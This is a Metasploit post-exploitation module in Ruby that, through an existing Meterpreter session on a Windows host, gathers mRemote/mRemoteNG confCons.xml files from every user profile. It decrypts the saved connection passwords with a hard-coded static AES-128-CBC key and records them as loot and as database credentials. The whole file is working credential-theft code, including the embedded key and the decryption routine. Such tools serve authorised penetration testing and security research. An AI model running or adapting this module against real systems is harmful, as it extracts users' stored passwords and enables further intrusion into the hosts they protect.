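##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'openssl'
require 'rexml/document'

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Auxiliary::Report

  # Static, application-wide key with which legacy mRemote / early mRemoteNG
  # builds AES-encrypt the Password attribute of every connection node. It is
  # the same on every install, which is why the passwords are recoverable at
  # all. Newer mRemoteNG releases reportedly moved to a key derived from a
  # master password and a different cipher mode; nodes from such files do not
  # decrypt under this key and are reported as undecryptable rather than
  # aborting the whole run.
  SECRET = "\xc8\xa3\x9d\xe2\xa5\x47\x66\xa0\xda\x87\x5f\x79\xaa\xf1\xaa\x8c".b.freeze

  # Legacy format: Password = base64( IV (16 bytes) || AES-128-CBC(plaintext) ).
  CIPHER = 'AES-128-CBC'.freeze
  IV_LEN = 16

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather mRemote Saved Password Extraction',
        'Description' => %q{
          This module extracts saved passwords from mRemote. mRemote stores
          connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves
          the passwords in an encrypted format. The module will extract the connection
          info and decrypt the saved passwords.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'theLightCosine',
          'hdm', # Helped write the Decryption Routine
          'mubix' # Helped write the Decryption Routine
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ]
      )
    )
  end

  # Entry point: for every user profile on the host, look for the classic
  # mRemote file under LocalAppData and the mRemoteNG file under AppData.
  def run
    # Kept so that anything still reading @secret keeps working.
    @secret = SECRET

    grab_user_profiles.each do |user|
      {
        'LocalAppData' => '\\Felix_Deimel\\mRemote\\confCons.xml',
        'AppData' => '\\mRemoteNG\\confCons.xml'
      }.each do |base_key, suffix|
        base = user[base_key]
        # Each base folder is checked on its own: the original only guarded
        # LocalAppData and raised on nil + String when AppData was missing.
        next if base.nil? || base.empty?

        get_xml(base + suffix)
      end
    end
  end

  # Fetch one confCons.xml from the target, save it as loot and parse it.
  # Read failures and malformed XML are reported and skipped so that the
  # remaining profiles are still processed.
  #
  # @param path [String] full Windows path of the confCons.xml to fetch
  # @return [void]
  def get_xml(path)
    print_status("Looking for #{path}")
    return unless file_exist?(path)

    condata = read_file(path)
    if condata.nil? || condata.empty?
      print_status("The file #{path} either could not be read or is empty")
      return
    end

    loot_path = store_loot('mremote.creds', 'text/xml', session, condata, path)
    vprint_good("confCons.xml saved to #{loot_path}")
    parse_xml(condata)
    print_status("Finished processing #{path}")
  rescue Rex::Post::Meterpreter::RequestError
    print_status("The file #{path} either could not be read or does not exist")
  rescue REXML::ParseException => e
    print_error("Failed to parse #{path} as XML: #{e.message}")
  end

  # Walk every <Node> element of a confCons.xml document, decrypt its
  # Password attribute and report the credential.
  #
  # @param data [String] raw XML contents of confCons.xml
  # @return [void]
  # @raise [REXML::ParseException] if data is not well-formed XML
  def parse_xml(data)
    root = REXML::Document.new(data).root
    return if root.nil?

    root.elements.to_a('//Node').each do |node|
      host = node.attributes['Hostname']
      port = node.attributes['Port']
      proto = node.attributes['Protocol']
      user = node.attributes['Username']
      domain = node.attributes['Domain']
      epassword = node.attributes['Password']
      next if epassword.nil? || epassword.empty?

      pass = decrypt_password(epassword)
      if pass.nil?
        # One undecryptable node (wrong format / key) must not abort the rest.
        print_warning("Could not decrypt password for #{user}@#{host} (not the legacy mRemote format?)")
        next
      end

      print_good("HOST: #{host} PORT: #{port} PROTOCOL: #{proto} Domain: #{domain} USER: #{user} PASS: #{pass}")
      report_mremote_credential(host, port, proto, user, domain, pass)
    end
  end

  # Generic symmetric decryption helper.
  #
  # @param encrypted_data [String] raw ciphertext (IV already stripped)
  # @param key [String] raw key bytes of the length the cipher expects
  # @param iv [String, nil] raw IV; not set on the cipher when nil
  # @param cipher_type [String] OpenSSL cipher name, e.g. 'AES-128-CBC'
  # @return [String] plaintext, with OpenSSL's default padding removed by #final
  # @raise [OpenSSL::Cipher::CipherError] on bad padding (wrong key/IV or truncated data)
  def decrypt(encrypted_data, key, iv, cipher_type)
    aes = OpenSSL::Cipher.new(cipher_type)
    aes.decrypt
    aes.key = key
    aes.iv = iv unless iv.nil?
    aes.update(encrypted_data) + aes.final
  end

  private

  # Decode and decrypt one Password attribute of the legacy format.
  #
  # @param epassword [String] base64 value of the node's Password attribute
  # @return [String, nil] plaintext password, or nil when the value is too
  #   short to hold an IV or does not decrypt under SECRET (bad padding)
  def decrypt_password(epassword)
    decoded = epassword.unpack('m').first
    return nil if decoded.bytesize <= IV_LEN

    iv = decoded.byteslice(0, IV_LEN)
    ciphertext = decoded.byteslice(IV_LEN..-1)
    decrypt(ciphertext, SECRET, iv, CIPHER)
  rescue OpenSSL::Cipher::CipherError
    nil
  end

  # Store the connection as a service plus an UNTRIED login in the database.
  # Nodes without a hostname (folders / containers) cannot be tied to a
  # service, so they are only printed, not stored.
  #
  # @param host [String, nil] Hostname attribute
  # @param port [String, nil] Port attribute as found in the XML
  # @param proto [String, nil] Protocol attribute, used as the service name
  # @param user [String, nil] Username attribute
  # @param domain [String, nil] Domain attribute; when present it becomes the realm
  # @param pass [String] decrypted password
  # @return [void]
  def report_mremote_credential(host, port, proto, user, domain, pass)
    if host.nil? || host.empty?
      vprint_status("No hostname for #{user}, credential not stored in the database")
      return
    end

    service_data = {
      address: host,
      port: port,
      service_name: proto,
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: refname,
      private_type: :password,
      private_data: pass,
      username: user
    }.merge(service_data)

    if domain.present?
      credential_data[:realm_key] = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
      credential_data[:realm_value] = domain
    end

    # Metasploit::Credential::Core, then the Login that ties it to the service.
    credential_core = create_credential(credential_data)

    login_data = {
      core: credential_core,
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_data)
    create_credential_login(login_data)
  end
end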